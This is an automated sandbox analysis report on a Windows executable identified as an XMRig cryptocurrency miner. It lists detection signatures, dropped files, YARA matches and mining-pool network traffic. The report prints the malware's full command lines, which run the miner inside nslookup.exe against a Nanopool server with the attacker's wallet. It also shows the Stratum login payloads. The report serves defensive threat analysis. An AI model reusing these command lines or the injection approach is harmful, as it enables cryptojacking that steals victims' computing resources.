Windows Analysis Report
boooba.exe

Overview

General Information

Sample name:	boooba.exe
Analysis ID:	1545299
MD5:	ef9e6a4bab77a1e5ed51669eabeba31d
SHA1:	43b67b32d2fd462f0cb9277ed974d63a5575fc8c
SHA256:	ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
Tags:	CoinMinerexeXMRiguser-NDA0E
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Xmrig

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Allocates memory in foreign processes

Creates a thread in another existing process (thread injection)

DNS related to crypt mining pools

Detected Stratum mining protocol

Drops PE files to the user root directory

Found direct / indirect Syscall (likely to bypass EDR)

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses nslookup.exe to query domains

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: boooba.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Avira: detection malicious, Label: HEUR/AGEN.1344832
Source: C:\Users\user\IOAshdohSha.exe	Avira: detection malicious, Label: HEUR/AGEN.1344202

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\IOAshdohSha.exe	ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: boooba.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\IOAshdohSha.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: boooba.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2902391217.0000019A4A4B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1794466299.000001F9F0E4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2902391217.0000019A4A4F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2903432689.0000029966FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2906554821.000002997F6D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2902391217.0000019A4A4B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2901760284.000002996549D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2902391217.0000019A4A50A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2901760284.00000299654CB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2900254186.0000000140751000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2902562928.000001F9F0DF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2902562928.000001F9F0E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2903432689.0000029966FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2902562928.000001F9F0DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2900249494.0000000140751000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2902562928.000001F9F0E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR

DNS related to crypt mining pools

Source: unknown

DNS query: name: xmr-eu1.nanopool.org

Detected Stratum mining protocol

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: global traffic	TCP traffic: 192.168.2.4:49731 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.

Found strings related to Crypto-Mining

Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Networking

Uses nslookup.exe to query domains

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 212.47.253.124 212.47.253.124

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: OnlineSASFR OnlineSASFR

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49731 -> 212.47.253.124:10300

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: xmr-eu1.nanopool.org

Source: conhost.exe, 00000001.00000002.1725964191.000001575B3C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
